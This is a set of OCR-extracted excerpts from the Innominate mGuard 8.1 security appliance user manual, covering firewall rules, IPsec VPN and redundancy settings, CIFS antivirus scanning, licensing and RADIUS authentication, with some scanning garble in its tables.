61. Working with non sortable tables Tables are non sortable if the order of the data records contained within them does not play any technical role It is then not possible to insert or move rows With these tables you can Delete rows Append rows to the end of the table in order to create a new data record with settings e g user firewall templates The symbols for inserting a new table row are therefore different C F C E 1 Click on the arrow to append a new row 2 The new row is appended below the existing table You can now enter or specify values in the row 105661_en_02 Innominate Security Technologies 23 m Guard 8 1 2 9 CIDR Classless Inter Domain Routing IP subnet masks and CIDR are methods of notation that combine several IP addresses to create a single address area An area comprising consecutive addresses is handled like a network To specify an area of IP addresses for the mGuard e g when configuring the firewall it may be necessary to specify the address area in CIDR format In the table below the left hand column shows the IP subnet mask while the far right hand column shows the correspond ing CIDR notation IP subnet mask PIO G2 59D 255 ZOOKLZI Se ASO Act PERA a AOS 25S 6 2 ZED 295 2596295 299425994255 755 255 3255 2599 299 209 ZOD at Ion 2D B POO ee ao ents ZOO ELOO BAe 400 w200 248 A Ke BAM 255 2 255 2204 295 4259 192 POD Poo L2G DIS esi
62. a superordinate CA certificate is in turn subordinate to another superordinate CA then its CA certificate can be used to check the CA certificate of the subordinate instance etc This chain of trust continues down to the root instance the root CA or certification authority The root CA s CA file is necessarily self signed since this instance is the highest available and is ultimately the basis of trust No one else can certify that this instance is actually the instance in question A root CA therefore is a state or a state controlled organization Innominate Security Technologies 357 mGuard 8 1 Client server Datagram Default route The mGuard can use its imported CA certificates to check the authenticity of certificates shown by partners In the case of VPN connections for example partners can only be au thenticated using CA certificates This requires all CA certificates to be installed on the mGuard in order to form a chain with the certificate shown by the partner In addition to the CA certificate from the CA whose signature appears on the certificate shown by the VPN partner to be checked this also includes the CA certificate of the superordinate CA and so forth up to the root certificate The more meticulously this chain of trust is checked in order to authenticate a partner the higher the level of security will be In a client server environment a server is a program or computer which accepts and re sponds to
63. a valid up to date copy of the VPN state database As with state synchronization of the firewall VPN state synchronization sends updates from the active mGuard to the mGuard on standby If requested to do so by the mGuard on standby the active mGuard sends a complete record of all state information Dedicated interface mGuard centerport In the case of the mGuard centerport you can permanently assign the third Ethernet inter face for the VPN state synchronization As with the state synchronization of the firewall the data traffic for the VPN state synchroni zation for the dedicated interface is transmitted when a variable is set Under Redundancy gt gt Firewall Redundancy gt gt Redundancy set the Interface which is used for state synchro nization to Dedicated Interface 105661_en_02 Innominate Security Technologies 345 mGuard 8 1 Establishing VPN connections In VPN redundancy the virtual network interface is used for an additional purpose to es tablish accept and operate the VPN connections The mGuard only listens on the first vir tual IP address In Router network mode it listens at the first external and internal virtual IP addresses State monitoring State monitoring is used to monitor state synchronization on both the VPN and firewall Status indicator The status indicator shows additional detailed information on the status of VPN state syn chronization This is located directly next to the informa
64. access you do not need to enter this port number after the address in the web browser of the remote partner lf a different port number is used it should be entered after the IP address e g https 123 124 125 21 442 The mGuard authenticates itself to the partner in this case the browser of the user using a self signed machine certificate This is a unique cer tificate issued by Innominate for each mGuard This means that every mGuard device is deliv ered with a unique self signed machine certifi cate Update SSH and Generate new 2048 bit keys HTTPS keys Keys that have been generated using a older firmware might be weak and should be renewed e Click on this button to generate a new key e Observe the fingerprints of the new keys generated e Login via HTTPS and compare the certificate information provided by the browser 58 Innominate Security Technologies 105661_en_02 Management gt gt Web Settings gt gt Access Allowed Networks Management menu SX e rromi O intertace Action Comment to p 1 External wv Accept v No v Lists the firewall rules that have been set up These apply for incoming data packets of an HTTPS remote access attempt If multiple firewall rules are defined these are queried starting from the top of the list of entries until an appropriate rule is found This rule is then applied If the list of rules con tains further subsequent rules that could also apply these
65. access for your anti virus software 9 3 1 CIFS Antivirus Scan Connector CIFS Antivirus Scan Connector YN CIFS Server Enablethe server Yes w Accessible as exported av share External 192 168 1 1 exported av share Internal 192 168 101 254 exported av share DMZ Servers workgroup WORKGROUP Login User Password eesvsceesee Exported share s name exported av share Allow writeaccess No w Please note To have the CIFS server enabled in the network mode Stealth a management IP must be set Allowed Networks Log ID fw cifs sccess IN 0 ce7 ca5e 79da 1695 sfd5 000cbe000566 a a SH i 0 0 0 0 0 DNZ Accept v Yes v f F 2 0 0 0 0 0 External w Drop v Yes v These rules allow to grant remote access to the CIFS server of the mGuard Please note In router mode with NAT or portforwarding the network ports required for the CIFS server have priority over portforwarding Please note Access to the CIFS server is granted from the internal side via dial in and VPN by default and can be restricted by these firewall rules Consolidated Imported Shares x Enabled CIFS Share Exported in Subdirectory fo Yes v Mounted and usable export directory CIFS Integrity Monitoring gt gt CIFS AV Scan Connector CIFS Server Enable the server No CIFS server is not available Yes CIFS server is available 242 Innominate Security Technologies 105661_en_02 CIFS Integrity Monitoring menu CIFS Integrity Monitoring gt
66. actual IP address of the redundant pair VPN partners must always use the virtual IP address of the redundant pair to send IKE messages or ESP traffic 105661_en_02 Innominate Security Technologies 351 mGuard 8 1 16 2 8 Transmission capacity with VPN redundancy These values apply to Router network mode when the data traffic for state synchronization is transmitted without encryption If the transmission capacity described here is exceeded in the event of errors the switching time may be longer than that set Platform Transmission capacity with firewall redun dancy mGuard centerport 220 Mbps bidirectional not more than 60 000 frames s mGuard industrial rs 50 Mbps bidirectional mGuard smart not more than 5550 frames s mGuard core mGuard pci n MHz mGuard blade mGuard delta EAGLE mGuard mGuard industrial rs 17 Mbps bidirectional mGuard smart not more than 2300 frames s mGuard core l mGuard pci n MHz mGuard blade mGuard delta EAGLE mGuard m Guard rs4000 17 Mbps bidirectional mGuard rs4000 3G not more than 2300 frames s mGuard smart mGuard core mGuard pci SD mGuard delta Bidirectional includes traffic in both directions For example 1500 Mbps means that 750 Mbps is forward ed in each direction Fail over switching time The fail over switching time can be set to 1 3 or 10 seconds in the event of errors The upper limit of 1 second is currently only adhered to by the mGuard centerpor
67. also kept for Dead Peer Detection until the renewal of the ISAKMP SA is complete An error interrupts the renewal of an IPsec SA If an error interrupts the renewal of an IPsec SA this is compensated in the same way as during the initial establishment of the SA Until renewal of the ISAKMP SA is complete the old outgoing and incoming IPsec SAs are retained until the VPN partner notices the change VPN state synchronization ensures that the old IPsec SAs are retained throughout the entire time that the mGuard remains on standby When the device becomes active it can then continue with the encryption and decryption of the data traffic without the need for further action Loss of data packets during VPN state synchronization State synchronization can cope with the loss of one of two back to back update packets If more data packets are lost this can result in a longer switching time in the event of errors The mGuard on standby has an obsolete machine certificate X 509 certificates and private keys used by a redundant pair to authenticate itself as a VPN partner may need to be changed The combination of a private key and certificate is here after referred to as a machine certificate Each mGuard in a redundant pair must be reconfigured in order to switch the machine cer tificate Both mGuard devices also require the same certificate so that their VPN partners view them as one and the same virtual VPN device As each mGuard has to be r
68. and during which a new key should be created Default setting 540 seconds 9 minutes 105661_en_02 Innominate Security Technologies 281 mGuard 8 1 IPsec VPN gt gt Connections gt gt Edit gt gt IKE Options Dead Peer Detection Re key Margin for the Traffic Limit Re key Fuzz Keying tries Re key Only applies to IPsec SAs The value O indicates that the traffic limit is not used O must be set here when 0 is also set under IPsec SA Traffic Limit If a value above 0 is entered then a new limit is calculated from two values The number of bytes entered here is sub tracted from the value specified under Psec SA Traffic Limit i e Hard Limit The calculated value is then known as the Soft Limit This specifies the number of bytes which must be encrypted for a new key to be negotiated for the IPsec SA A further amount is subtracted when a Re key Fuzz see be low above 0 is entered This is a percentage of the re key margin The percentage is entered under Re key Fuzz The re key margin value must be lower than the Hard Limit lt must be significantly lower when a Re key Fuzz is also added If the Psec SA Lifetime is reached earlier the Soft Limit is ig nored Maximum percentage by which Re key Margin is to be in creased at random This is used to delay key exchange on ma chines with multiple VPN connections Default setting 100 percent Number of attempts to negotiate new keys with the part
69. are based on UDP Data always flows in both directions on TCP connections 338 Innominate Security Technologies 105661_en_02 Redundancy If the firewall of the mGuard is set up to only accept data packets from the initiator the fire wall accepts all related responses per se This happens regardless of whether or not a rel evant firewall rule is available A scenario is conceivable in which the mGuard allows the initiating data packet to pass through and then fails before the relevant connection entry has been made in the other mGuard The other mGuard may then reject the responses as soon as it becomes the active mGuard The mGuard cannot correct this situation due to the single sided connection As a counter measure the firewall can be configured so that the connection can be established in both directions This is normally already handled via the protocol layer and no additional assign ment is required Loss of data packets during state synchronization lf data packets are lost during state synchronization this is detected automatically by the mGuard which then requests the active mGuard to send the data again This request must be answered within a certain time otherwise the mGuard on standby is assigned the outdated state and asks the active mGuard for a complete copy of all state information The response time is calculated automatically from the fail over switching time This is lon ger than the time for presenc
70. are three different categories of personal injury that are indicated by a sig nal word DANGER This indicates a hazardous situation which if not avoided will re sult in death or serious injury WARNING This indicates a hazardous situation which if not avoided could result in death or serious injury CAUTION This indicates a hazardous situation which if not avoided could result in minor or moderate injury This symbol together with the signal word NOTE and the accompanying text alert the reader to a situation which may cause damage or malfunction to the de vice hardware software or surrounding property This symbol and the accompanying text provide the reader with additional infor mation or refer to detailed sources of information j OS Innominate Security Technologies General terms and conditions of use for technical documentation Innominate reserves the right to alter correct and or improve the technical documentation and the products described in the technical documentation at its own discretion and without giving prior notice insofar as this is reasonable for the user The same applies to any changes that serve the purpose of technical progress The receipt of technical documentation in particular user documentation does not consti tute any further duty on the part of Innominate to furnish information on modifications to products and or technical documentation You are responsible for verifying the suitability
71. be configured From Version 8 0 the VPN configuration permits a remote network with different local net works in one configuration The VPN tunnel groups are extended so that they permit an es tablished VPN connection to select only one subnetwork from the local network In previous versions this was only possible for remote networks Innominate Security Technologies 31 mGuard 8 1 32 Innominate Security Technologies 105661_en_02 Management menu 4 Management menu For security reasons we recommend you change the default root and administrator pass words during initial configuration see Authentication gt gt Administrative Users on page 181 Amessage informing you of this will continue to be displayed at the top of the page until the passwords are changed 4 1 Management gt gt System Settings 4 1 1 Host Host Time and Date e Shell Access E Mail System Uptime 52 min Power supply 1 Power supply 7 working Power supply 2 Power supply 2 working System Temperature C min 0 EC current 37 2 C max 60 LE System DNS Hostname Hostname mode User defined from field below Hostname mguard Domain search path example local SNMP Information System Name Location Contact Management gt gt System Settings gt gt Host System Uptime Device operating time since the last restart only mGuard rs4000 3G mGuard rs4000 mGuard centerport mGuard industrial rs EAGLE mGuard
72. been established for the connection Defining a VPN connection VPN connection channels Depending on the network mode of the mGuard the following page appears after clicking on Edit 256 Innominate Security Technologies 105661_en_02 10 2 2 IPsec VPN menu General IPsec VPN Connections unnamed General Authentication Options A descriptive name for the connection Initial Mode Address of the remote site s VPN gateway Either an IP address a hostname or oany for any IP multiple clients or clients behind a NAT gateway Interface to use for gateway setting any Connection startup Controlling service input Firewall IKE Options unnamed Started Y any External 0 0 0 0 Wait v None v Deactivation Timeout 0 Token for text message trigger Encapsulate the WPN traffic intep Transport and Tunnel Settings Minutes Yes y IPsec VPN gt gt Connections gt gt Edit gt gt General Options A descriptive name for the connection Initial Mode Address of the remote site s VPN gateway 105661_en_02 Tunnel v 192 168 1 1 32 The connection can be freely named renamed If several con nection channels are defined under Transport and Tunnel Settings then this name applies to the entire set of VPN con nection channels grouped under this name Similarities between VPN connection channels Same authentication method as s
73. can limit the outgoing or incoming ac cess individually for each connection Any attempts to bypass these restrictions can be logged By default the VPN firewall is set to allow all connections for this VPN connection However the extended firewall settings defined and explained above apply independent ly for each individual VPN connection see Network Security menu on page 205 Network Security gt gt Packet Filter on page 205 Advanced on page 216 If multiple firewall rules are defined these are queried starting from the top of the list of entries until an appropriate rule is found This rule is then applied If the list of rules con tains further subsequent rules that could also apply these rules are ignored In Stealth mode the actual IP address used by the client should be used in the firewall rules or it should be left at 0 0 0 0 0 as only one client can be addressed through the tun nel If the Allow packet forwarding between VPN connections option is set to Yes on the Glob al tab page the rules under Incoming are used for the incoming data packets to the mGuard and the rules under Outgoing are applied to the outgoing data packets me ete lee me If the outgoing data packets are included in the same connection definition for a defined VPN connection group then the firewall rules for Incoming and Outgoing for the same connection definition are used If a different VPN connection definition ap
74. check is not currently active The mGuard creates a database with checksums in order to check whether files have been changed A change to execut able files indicates a virus However if these files have been changed intentionally anew database must be created by clicking on Initialize in order to prevent false alarms The creation of an integrity database is also recommended if network drives have been newly set up Otherwise an integ rity database is set up during the first scheduled check instead of a check being performed Click on Cancel to stop the integrity check 105661_en_02 CIFS Integrity Monitoring menu CIFS Integrity Monitoring gt gt CIFS Integrity Checking gt gt Settings gt gt Edit gt gt Management Erase reports andthe Click on Erase to delete all existing reports databases integrily database A new integrity database must be created for any further integ rity checks This can be initiated by clicking on Initialize Oth erwise anew integrity database is created automatically upon the next scheduled check This procedure cannot be seen 105661_en_02 Innominate Security Technologies 239 m Guard 8 1 9 2 2 Filename Patterns CIFS Integrity Monitoring CIFS Integrity Checking Settings l Filename Patterns Sets of Filename Patterns SS a sa executables f oO For C CIFS Integrity Monitoring gt gt CIFS Integrity Checking gt gt Filename Patterns Sets of Filename
75. click on Online License Re quest The mGuard now establishes a connection via the Internet and installs the corresponding license on the mGuard if the voucher is valid Reload Licenses This option can be used if the license installed on the mGuard has been deleted Click on Online License Reload The licenses that were previously issued for this mGuard are then retrieved from the server via the Internet and installed Manual License Installation Order License After clicking on Edit License Request Form an online form is displayed which can be used to order the desired license Enter the following information in the form Voucher Serial Number the serial number printed on your voucher Voucher Key the voucher key on your voucher Flash ID this is entered automatically Filename After sending the form the license file is made available for download and can be installed on the mGuard in a further step Install license file To install a license first save the license file as a separate file on your computer then proceed as follows e Click on Browse next to the Filename field Select the file and open it so that the file name or path is displayed in the Filename field e Then click on Install license file 68 Innominate Security Technologies 105661_en_02 Management menu 4 3 3 Terms of License Management Licensing Overview instan Terms of License mGuard Firmware License Inf
76. com 10 1 31 1 24 fold cell b example com 10 1 31 2 24 fill cell b example com Plant network Ethernet 10 1 31 3 24 pack cell b example com Switch 10 1 81 0 24 10 1 32 1 24 ontroller A Machine C Pontrolier A fold cell c example com 10 1 32 2 24 fill cell c example com ontroller B ontroller C 10 1 32 3 24 eeoeooeeve pack cell c example com Switch 10 1 32 0 24 a 5 Host Domain name Figure 6 1 Local Resolving of Hostnames 105661_en_02 Innominate Security Technologies 159 mGuard 8 1 Network gt gt DNS gt gt DynDNS DynDNS 160 6 4 2 DynDNS DNS server DynDNS DynDNS Register this mGuard at a DynDNS Service No w Status Status Message Refresh Interval sec 420 DynDNS Provider DynDNS Server DynDNS Port 30 DynDNS Login DynDNS Password DynDNS service disabled DynDNS compatible v au eu dns4biz biz New Password New Password again DynDNS Hostname host example com In order for a VPN connection to be established at least one partner IP address must be known so that the partners can contact each other This condition is not met if both partic ipants are assigned IP addresses dynamically by their respective Internet service provid ers In this case a DynDNS service such as DynDNS org or DNS4BIZ com can be of as sistance With a DynDNS service the currently valid IP address is registered under a fixed name If you ha
77. connection establishment with encapsulated packets lated For technical reasons the RAM RAM require ments increase with each interface that is used to listen out for VPN connections encapsulated in TCP If multiple interfaces need to be used for lis tening then the device must have at least 64 Mbytes RAM The interfaces to be used for listening are determined by the mGuard according to the settings on the active VPN connec tions that have any configured as the partner The decisive setting is specified under Interface to use for gateway setting Yany 105661_en_02 Innominate Security Technologies 251 mGuard 8 1 IPsec VPN gt gt Global gt gt Options TCP port to listen on Server ID 0 63 IP Fragmentation IKE Fragmentation 252 Innominate Security Technologies Number of the TCP port where the encapsulated data packets to be received arrive The port number specified here must be the same as the one specified for the mGuard of the partner as the TCP port of the server which accepts the encapsu lated connection Psec VPN gt gt Connections menu item Edit General tab page The following restriction applies The port to be used for listening must not be identical to a port that is being used for remote access SSH HTTPS or SEC Stick Usually the default value 0 does not have to be changed The numbers are used to differentiate between different control centers A different n
78. create a certificate a private key and the corresponding public key are required Pro grams are available so that any user can create these keys Similarly a corresponding cer tificate with the corresponding public key can also be created resulting in a self signed cer tificate Additional information about self creation can be downloaded from www innominate com It is available in the download area in an application note entitled How to obtain X 509 certificates A corresponding certificate signed by a CA must be requested from the CA In order for the private key to be imported into the mGuard with the corresponding certifi cate these components must be packed into a PKCS 12 file file name extension p12 Authentication methods The mGuard uses two methods of X 509 authentication that are fundamentally different The authentication of a partner is carried out based on the certificate and remote certif icate In this case the remote certificate that is to be consulted must be specified for each individual connection e g for VPN connections The mGuard consults the CA certificates provided to check whether the certificate shown by the partner is authentic This requires all CA certificates to be made available to the mGuard in order to form a chain with the certificate shown by the partner through to the root certificate Available means that the relevant CA certificates must be installed on the mGuard se
79. criteria specified on the left i e that may pass through The mGuard may drop the excess number of data packets in the event of capacity bottlenecks if this data stream delivers more data packets per second than specified The number entered specifies the maximum number of data packets per second or kbps that can pass through according to the option set under Measurement Unit See above This applies to the data stream that conforms to the rule set criteria specified on the left i e that may pass through The mGuard drops the excess number of data packets if this data stream delivers more data packets per second than specified Optional comment text Innominate Security Technologies 295 m Guard 8 1 12 2 Egress Queues The services are assigned corresponding priority levels In the event of connection bottle necks the outgoing data packets are placed in egress queues i e queues for pending packets according to the assigned priority level and are then processed according to their priority Ideally the assignment of priority levels and bandwidths should result in a sufficient bandwidth level always being available for the realtime transmission of data packets while other packets e g FTP downloads are temporarily set to wait in critical cases The main application of egress QoS is the optimal utilization of the available bandwidth on a connection In certain cases a limitation of the packet rate can be useful e g t
80. device before a major release upgrade e g from Version 4 x y to Version 5 x y or from Version 5 x y to Version 6 x y can be installed The license must be installed on the device before updating the firmware see Manage ment gt gt Licensing on page 67 and Install on page 67 Minor release upgrades i e the same major version e g within Version 5 x y can be installed without a license until further notice 4 3 5 Overview Overview Update System Information Version 8 0 0 default Base 8 0 0 default Updates none Package Versions authdaemon 0 0 3 0 default bcron 0 1 4 0 default bridge utils 0 1 5 0 default brnetlink 0 0 2 1 default busybox 0 1 9 1 default chat 0 2 8 0 default conntrack 0 1 2 0 default Management gt gt Update gt gt Overview System Information Version The current software version of the mGuard Base The software version that was originally used to flash this mGuard Updates List of updates that have been installed on the base Package Versions Lists the individual software modules of the mGuard Can be used for support purposes 70 Innominate Security Technologies 105661_en_02 105661 _en_02 Management menu 4 3 6 Update Firmware updates with firewall redundancy enabled Updates of Version 7 3 1 or later can be performed while an mGuard redundant pair is con nected and operating This does not apply to the following devices mdGuard industrial rs
81. devices that are connected to the same Ethernet segment through their external internal interface Please note that CARP uses the same protocol and port as VRRR Virtual Router Redundancy Protocol The ID set here must be different to the IDs on other devices which use VRRR or CARP and are located in the same Ethernet segment Internal virtual IP As described under External virtual IP addresses but with two addresses exceptions Under Internal virtual IP addresses IP addresses are de fined for devices which belong to the internal Ethernet seg ment These devices must use the IP address as their default gateway These addresses can be used as a DNS or NTP server when the mGuard is configured as a server for the pro tocols For each virtual IP address an actual IP address must be con figured whose IP network accommodates the virtual address The response to ICMP requests with internal virtual IP ad dresses is independent from the settings made under Network Security gt gt Packet Filter gt gt Advanced Encrypted state synchroni Encrypt the state mes Yes No sanon mages If Yes is selected state synchronization is encrypted Passphrase The password is changed as described under Passphrase for availability checks on page 307 Only deviate from the prescribed approach if an incorrect password has been inadvertently entered 310 Innominate Security Technologies 105661_en_02 Redundancy menu Redundancy gt gt Fi
82. displayed under CIFS Integrity Monitoring gt gt CIFS AV Scan Connector gt gt Ac cessible as lt External IP of MGUARD gt lt Name of the exported share gt lt Internal IP of MGUARD gt lt Name of the exported share gt Example 10 1 66 49 exported av share 192 168 66 49 exported av share Alternatively you can enter the net use command in the command line For further infor mation please refer to the Microsoft product information Notes DNS names can also be used instead of the IP address The authorized network drive cannot be found using the browse or search function The Exported share s name must always be added Windows does not automatically display the authorized network drive upon connection of the mGuard Innominate Security Technologies 245 mGuard 8 1 246 Innominate Security Technologies 105661_en_02 IPsec VPN menu 10 IPsec VPN menu This menu is not available on the mGuard blade controller 10 1 IPsec VPN gt gt Global 10 1 1 Options IPsec VPN Global Options DynDNS Monitoring Options Allow packet forwarding No w between VPN connections The value Yes will not be applied to the network mode Stealth Archive diagnostic messages No for VPN connections Yv TCP Encapsulation connections which are No w IP Fragmentation Some routers fail to forward large UDP packets which may break the IPsec protocol The following opt
83. for VPN redundancy If the required license keys are installed VPN redundancy is automatically activated at the same time as firewall redundancy This occurs as soon as Enable redundancy is set to Yes in the Redundancy gt gt Firewall Redundancy gt gt Redundancy menu There is no separate menu for VPN redundancy The existing firewall redundancy variables are expanded Table 16 3 Expanded functions with VPN redundancy activated Redundancy gt gt Firewall Redundancy gt gt Redundancy General Virtual interfaces 105661_en_02 Enable redundancy Firewall redundancy and VPN redundancy are activated or deactivated External virtual IP Only in Router network mode addresses The mGuard uses the first external virtual IP address as the address from which it sends and receives IKE messages The external virtual IP address is used instead of the actual primary IP address of the external network interface The mGuard no longer uses the actual IP address to send or answer IKE messages ESP data traffic is handled similarly but is also accepted and processed by the actual IP address Internal virtual IP As described under External virtual IP addresses but for inter addresses nal virtual IP addresses Innominate Security Technologies 347 mGuard 8 1 16 2 5 Requirements for VPN redundancy VPN redundancy can only be activated if a license key is installed for VPN redundancy and a VPN connection is activated m
84. for administrative users whose password is checked using a RADIUS server when accessing the mGuard Each of these groups can be assigned an administrative role Authentication gt gt Administrative Users gt gt RADIUS Filters This menu item is not included The mGuard only checks passwords using RADIUS servers if you have activated RA in the scope of functions for DIUS authentication the mGuard rs2000 3G For shell access see menu Management gt gt System Settings gt gt Shell Access mGuard rs2000 For web access see menu Management gt gt Web Settings gt gt Access The RADIUS filters are searched consecutively When the first match is found access is granted with the corresponding role admin netadmin audit After a RADIUS server has checked and accepted a user s password it sends the mGuard a list of filter IDs in its response These filter IDs are assigned to the user in a server database They are used by the mGuard for assigning the group and hence the authorization level as admin netadmin or audit If authentication is successful this is noted as part of the mGuard s logging process Other user actions are logged here using the original name of the user The log messages are forwarded to a SysLog server provided a SysLog server has been approved by the mGuard The following actions are recorded Login Logout Start of a firmware update Changes to the configuration
85. gt gt User Firewall on page 225 7 2 1 Firewall Users This menu is not available on the mGuard rs2000 3G Administrative access simultaneously via X 509 authentication and via login to the mGuard user firewall is not possible with the Safari browser Authentication Firewall Users Firewall Users Access Status Users Enable user firewall Yes wv Enable group authentication No wv Service_1 LocalDB w Authentication gt gt Firewall Users gt gt Firewall Users Users Lists the firewall users by their assigned user names Also specifies the authen tication method Enable user firewall Under the Network Security gt gt User Firewall menu item fire wall rules can be defined and assigned to specific firewall us ers When set to Yes the firewall rules assigned to the listed users are applied as soon as the corresponding user logs in Enable group authen If activated the mGuard forwards login requests for unknown tication users to the RADIUS server If successful the response from the RADIUS server will contain a group name The mGuard then enables user firewall templates containing this group name as the template user The RADIUS server must be configured to deliver this group name in the Access Accept packet as a Filter ID lt group name gt attribute User Name Name specified by the user during login 105661_en_02 Innominate Security Technologies 185 mGuard 8 1 Authentication g
86. have been defined under the Authentication gt gt Firewall Users menu see Page 185 Firewall rules Network Security User Firewall BluePrint General Template users Firewall rules Firewall rules Source IP authorized_ip Log ID utw IV 240 3322 3649 1490 0355 000002060000 gt EEN A TT O O comment f Loa f ie 1 TCP v any 0 0 0 0 0 any important Yes vw Source IP IP address from which connections are allowed to be estab lished If this should be the address from which the user logged into the mGuard the wildcard authorized_ip should be used If multiple firewall rules are defined these are que ried starting from the top of the list of entries until an appropriate rule is found This rule is then ap plied If the list of rules contains further subse quent rules that could also apply these rules are ignored Protocol All means TCP UDP ICMP GRE and other IP protocols From Port To Port Only evaluated for TCP and UDP protocols any refers to any port gstartport endport e g 110 120 gt port area Individual ports can be specified using the port number or the corresponding service name e g 110 for pop3 or pops for 110 To IP 0 0 0 0 0 means all IP addresses To specify an address area use CIDR format see CIDR Classless Inter Domain Rout ing on page 24 Comment Freely selectable comment for this rule Log For each firewall rule you can specify
87. in VPN connections ccccseeeeeceeeeeeeeeeeeeeeseaeeeeesaeeenens 27 3 1 2 Dynamic activation of the firewall rules conditional firewall 27 3 1 3 Function extension of the Service contacts ccccseeeeeeeeeeeeeeeeeeeeeeens 28 3 1 4 OPC Inspector for Deep Packet Inspection for OPC Classic 29 3 1 5 Additional iunc HONS s s2c20cc secicrads a apa a aaa 29 3 2 Overview of modifications in version 8 0 ccccceeeeeeceseeeeeceaeeeeeeseeeeeeesaeeesesseneess 30 3 2 1 New in CIFS Integrity Monitoring sssssesssssessennssnsssnnrsesernrrrrrerrrrrrrennnn 31 3 2 2 VEN xXteNSIONS spremere en a aaa a Aaaa 31 4 Management MENU serria r a E 33 4 1 Management gt gt System SettinGS ccccccccsssecceceeseeeeceeseeecseseeeessssseeseenseeeessees 33 4 1 1 PIOGSU E EEEE E TEE E E ETE EEIE TE EATE ETT 33 4 1 2 Timeand Datei e5sice sata ncitcicena te edacectscandaadecseeniwcdedint sande eavieeaessaoeem al 35 4 1 3 Shell ACCESS wate etrestteece ad ccbcearcn E i 40 4 1 4 EMail a Si secte ase castes a laces a 52 4 2 Management gt gt Web Settings ccccssecccceesecceceeseeecceseeeeeesseeeseseeesseaseeesseees 56 4 2 1 General nena ne eer eR tenn ee ee ee ee eee 56 4 2 2 ACCESS Siete siisensact Sui a a a a 57 4 3 Management gt gt Licensing cc sssccccseeeecceeseecceeeeceecceaseeeeneeeeessuseeessanseesssaaes 67 4 3 1 OVEIVICW neiniau a 67 4 3 2 BS I etd etc EE DE AAA AAA AT REE
88. in can be used to access the LAN or the mGuard for configuration purposes see Modem Console on page 139 If the modem is used for dialing out by acting as the primary external interface Modem network mode of the mGuard or as its secondary external interface when activated in Stealth or Router network mode it is not available for the PPP dial in option 136 Innominate Security Technologies 105661_en_02 Network gt gt Interfaces gt gt Dial in Modem PPP Modem PPP Local IP Remote IP PPP Login name PPP Password 105661_en_02 Network menu Only mGuard rs4000 3G mGuard rs4000 m Guard industrial rs without built in modem ISDN TA mGuard delta mGuard delta EAGLE mGuard Off On This option must be set to Off if no serial interface is to be used for the PPP dial in option If this option is set to On the PPP dial in option is available The connection settings for the connected external modem should be made on the Modem Console tab page Only for mGuard industrial rs with built in modem ISDN TA Off Built in Modem External Modem This option must be set to Off if no serial interface should be used for the PPP dial in option If this option is set to External Modem the PPP dial in option is available An external modem must then be connected to the serial interface The connection settings for the connected external modem should be made on the Modem Console tab page If t
89. informed of their rejection In Stealth mode Reject has the same effect as Drop Drop means that the data packets are not permitted to pass through They are discarded which means that the sender is not informed of their whereabouts Name of rule sets if defined When a name is specified for rule sets the firewall rules saved under this name take effect see Rule Records tab page Comment Freely selectable comment for this rule Log For each individual firewall rule you can specify whether the use of the rule Should be logged set Log to Yes Should not be logged set Log to No default settings Log entries for When set to Yes all connection attempts that are not covered unknown connection by the rules defined above are logged Default settings No attempts 105661_en_02 Innominate Security Technologies 209 m Guard 8 1 8 1 3 DMZ WAN DMZ Log ID fw dmz incoming wan N 3391dde0 f26e 19820 s50e 000cbe0005ee ESP intertace Protocol Frome f Fromrot tor Topot Action Comment tog p 1 External v TCP 00 0 00 any 0 0 0 0 0 any Accept v Yes v Log entries for unknown connection attempts Yes v DMZ LAN Log ID fw dmz incoming lan NV 3391 dddf f26e 1320 s50e 000cbe0005ee PES Protocot frome romet to toro Action Comment Log p 1 TCP 0 0 0 0 0 any 0 0 0 0 0 any Reject v Yes v Log entries for unknown connection
90. is expected the half duplex mode is not suitable here The time required for the transmission of the ICMP echo request to a target Consider the latency during periods of high capacity utilization This applies especially when rout ers forward the request The actual latency may be twice the value of the configured la tency in unfavorable circumstances connectivity check error The time required on each target for processing the request and transmitting the reply to the Ethernet layer Please note that the full duplex mode is also used here The time for transmission of the ICMP echo reply to the mGuard Table 16 1 Frequency of the ICMP echo requests Fail over ICMP echo Timeout on the Bandwidth per tar switching time requests per target mGuard after trans get mission If secondary targets are configured then additional ICMP echo requests may occasionally be sent to these targets This must be taken into account when calculating the ICMP echo request rate The timeout for a single ICMP echo request is displayed in Table 16 1 This does not indi cate how many of the responses can be missed before the connectivity check fails The check tolerates a negative result for one of two back to back intervals Availability check Presence notifications CARP measure up to 76 bytes on layer 3 of the Internet protocol When VLAN is not used 18 bytes for the MAC header and checksum are added to this with the Ethernet on la
91. it To do this it takes data from a local routing table listing assignments be tween available networks and router connections or intermediate stations SNMP Simple Network Management Protocol is often used alongside other protocols in particular on large networks This UDP based protocol is used for central administration of network devices For example the configuration of a device can be requested using the GET command and changed using the SET command the requested network device must simply be SNMP compatible An SNMP compatible device can also send SNMP messages e g should unexpected events occur Messages of this type are known as SNMP traps A type of seal that certifies the authenticity of a public key gt asymmetrical encryption and the associated data It is possible to use certification to enable the user of the public key used to encrypt the data to ensure that the received public key is indeed from its actual issuer and thus from the instance that should later receive the data A certification authority CA certifies the au thenticity of the public key and the associated link between the identity of the issuer and its key The certification authority verifies authenticity in accordance with its rules for example it may require the issuer of the public key to appear before it in person After successful au thentication the CA adds its digital signature to the issuer s public key This results ina cert
92. local database on the mGuard Select Yes to enable users to be authenticated via a RADIUS server This also applies for users who want to access the mGuard via shell access using SSH or a serial console The password is only checked locally in the case of predefined users root admin netadmin and audit The netadmin and audit authorization levels relate to access rights with the mGuard device manager Under X 509 Authentication if you set Enable X 509 certificates for SSH access to Yes the X 509 authentica tion procedure can be used as an alternative Which proce dure is actually used by the user depends on how the user uses the SSH client When setting up a RADIUS authentication for the first time se lect Yes You should only select As only method for password authentication if you are an experi enced user as doing so could result in all access to the mGuard being blocked If you do intend to use the As only method for password au thentication option when setting up RADIUS authentication we recommend that you create a Customized Default Profile which resets the authentication method The predefined users root admin netadmin and audit are then no longer able to log in to the mGuard via SSH or serial console There is one exception it is still possible to perform authenti cation via an externally accessible serial console by correctly entering the local password for the root user name 105661_en_02
